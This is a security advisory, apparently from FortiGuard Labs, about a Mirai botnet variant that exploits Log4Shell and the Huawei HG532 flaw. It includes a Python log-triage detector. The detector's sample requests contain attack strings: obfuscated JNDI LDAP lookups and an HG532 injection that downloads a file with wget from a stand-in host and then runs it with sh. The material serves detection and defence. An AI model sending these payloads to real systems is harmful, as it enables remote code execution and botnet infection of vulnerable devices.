Mirai Malware that Allegedly Propagates Using Log4Shell Spotted in the Wild

Description

FortiGuard Labs is aware of a new Mirai Linux variant that spreads using CVE-2021-44228 (Log4Shell). This is possibly the first Mirai variant observed with Log4Shell exploit code built in since the vulnerability came to light on December 9th, 2021.

This sample was discovered by security researcher @1ZRR4H on Twitter.

How does this Mirai Variant Work? Is this a Worm?
The Mirai variant exploits CVE-2021-44228 (Log4Shell) and CVE-2017-17215 (Huawei HG532 Remote Code Execution). In the Log4Shell case, a malicious ${jndi:...} lookup string causes the vulnerable Log4j instance on the targeted machine to contact an attacker-controlled LDAP server, which hands the next-stage payload (the payload varies) to the victim machine.
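Because both exploits arrive as HTTP requests, the practical question for a defender is what those requests look like in web or proxy logs. The following is an added example, not FortiGuard's code and not taken from the sample: it normalizes the common Log4j lookup obfuscations (${lower:j}, ${::-j}, ${env:X:-j}) and URL encoding before matching ${jndi:...}, and flags the publicly documented HG532 pattern of a $(...) command inside NewStatusURL/NewDownloadURL in a POST to /ctrlt/DeviceUpgrade_1. The request records, IP addresses and the wget command line are constructed for the example; the real variant's payload URLs are not reproduced here.

```python
"""Triage HTTP requests for the two exploits this Mirai variant carries.
Added example; the request records below are constructed, not captured."""
import re
from urllib.parse import unquote

# Log4j lookup obfuscations attackers wrap around "jndi":
#   ${lower:J} -> j, ${upper:j} -> J, ${::-j} -> j, ${env:NOPE:-j} -> j
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# Name part excludes "/" so a real ldap://host URL is never mistaken for a default.
_DEFAULT = re.compile(r"\$\{[^${}/]*:-([^${}]*)\}")
# Schemes Log4j hands to JNDI; ldap/ldaps/rmi are the ones seen in the wild.
_JNDI = re.compile(r"\$\{jndi:(?:ldaps?|rmi|dns|iiop|corba|nds|nis):[^}]*\}", re.IGNORECASE)

# CVE-2017-17215: command injection via the HG532 UPnP "Upgrade" SOAP action.
_HG532_PATH = "/ctrlt/DeviceUpgrade_1"
_HG532_INJ = re.compile(
    r"<New(?:Status|Download)URL>\s*\$\((.*?)\)\s*</New(?:Status|Download)URL>", re.S)


def normalize_lookup(value: str) -> str:
    """URL-decode, then resolve nested lookups until the string stops changing."""
    s = unquote(value)
    prev = None
    while prev != s:
        prev = s
        s = _CASE.sub(lambda m: m.group(2).lower() if m.group(1).lower() == "lower"
                      else m.group(2).upper(), s)
        s = _DEFAULT.sub(lambda m: m.group(1), s)
    return s


def find_log4shell(request: dict) -> list:
    """Return every ${jndi:...} lookup found in attacker-controlled fields, de-obfuscated."""
    fields = [request.get("path", ""), request.get("body", "")]
    fields += list(request.get("headers", {}).values())
    hits = []
    for raw in fields:
        hits += [m.group(0) for m in _JNDI.finditer(normalize_lookup(raw))]
    return hits


def find_hg532(request: dict) -> list:
    """Return the injected shell commands from an HG532 DeviceUpgrade_1 request."""
    if request.get("method") != "POST" or request.get("path") != _HG532_PATH:
        return []
    return _HG532_INJ.findall(request.get("body", ""))


def triage(requests: list) -> list:
    """Map each request to (CVE, source address, indicator) tuples."""
    findings = []
    for r in requests:
        for lookup in find_log4shell(r):
            findings.append(("CVE-2021-44228", r["src"], lookup))
        for cmd in find_hg532(r):
            findings.append(("CVE-2017-17215", r["src"], cmd))
    return findings


# Constructed sample traffic (documentation-range IPs, not real infrastructure).
SAMPLE_REQUESTS = [
    # Plain JNDI lookup in the User-Agent header
    {"src": "203.0.113.10", "method": "GET", "path": "/",
     "headers": {"User-Agent": "${jndi:ldap://198.51.100.7:1389/a}"}, "body": ""},
    # Same lookup hidden behind lookup obfuscation and URL encoding in the query string:
    # decodes to ${${lower:j}${::-n}di:ldap://198.51.100.7:1389/a}
    {"src": "203.0.113.11", "method": "GET",
     "path": "/login?user=%24%7B%24%7Blower%3Aj%7D%24%7B%3A%3A-n%7Ddi%3Aldap%3A%2F%2F"
             "198.51.100.7%3A1389%2Fa%7D",
     "headers": {"User-Agent": "Mozilla/5.0"}, "body": ""},
    # HG532 SOAP request carrying a shell command in NewStatusURL
    {"src": "203.0.113.12", "method": "POST", "path": "/ctrlt/DeviceUpgrade_1",
     "headers": {"Content-Type": "text/xml"},
     "body": '<?xml version="1.0"?><s:Envelope><s:Body>'
             '<u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">'
             '<NewStatusURL>$(/bin/busybox wget -g 198.51.100.7 -l /tmp/x -r /x; sh /tmp/x)'
             '</NewStatusURL><NewDownloadURL>HUAWEIUPNP</NewDownloadURL>'
             '</u:Upgrade></s:Body></s:Envelope>'},
    # Benign request that merely mentions the word "jndi"
    {"src": "203.0.113.13", "method": "GET", "path": "/docs?q=jndi+ldap",
     "headers": {"User-Agent": "curl/7.79"}, "body": ""},
]

if __name__ == "__main__":
    for cve, src, indicator in triage(SAMPLE_REQUESTS):
        print(f"{cve} from {src}: {indicator}")
```

The normalization loop matters more than the final regex: a plain `${jndi:` signature misses the second request entirely, while the third request never contains "jndi" at all and is caught only by the SOAP-body rule. Both rules are string matching over decoded requests, so they belong in log triage or a WAF, not as proof of compromise; the LDAP callback and the subsequent download of the Mirai binary are the confirming events.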

Furthermore, chatter on OSINT channels has discussed whether or not this is a "worm." Our findings reveal that, like a worm, it has the capability to propagate. What makes it not a worm in the traditional sense is that all instructions are under the control of the botmaster and it relies on an external resource (such as the LDAP server that delivers the next-stage payload) for propagation. The botmaster can also start and stop its various actions, whereas a worm spreads on its own. In conclusion, our analysis finds that this Mirai variant is equipped with Log4Shell exploit code and Huawei HG532 exploit code but does not classify as a worm.

What is Mirai malware?
Mirai malware is a Linux IoT malware that makes infected machines join a zombie network that is used for Distributed Denial of Service (DDoS) attacks. The first report of Mirai goes back to at least August 2016. Since the source code of Mirai was leaked publicly, there have been numerous threat actors and campaigns incorporating Mirai and related variants in the wild.

FortiGuard Labs previously published several blogs on Mirai IoT malware. Please refer to the APPENDIX for links to related blogs.

Why is this Significant?
This sample was reported to be one of the first worm-like samples exploiting Log4Shell. However, our analysis has concluded that this specific sample does not qualify as a worm.

What is the Status of Coverage?
FortiGuard Labs provides the following AV coverage against this Mirai malware variant:

ELF/Mirai.VI!tr

FortiGuard Labs provides the following IPS coverage against CVE-2017-17215:

Huawei.HG532.Remote.Code.Execution

For FortiEDR, all known samples have been added to our cloud intelligence and will be blocked if executed.

All network IOCs are blocked by the WebFiltering client.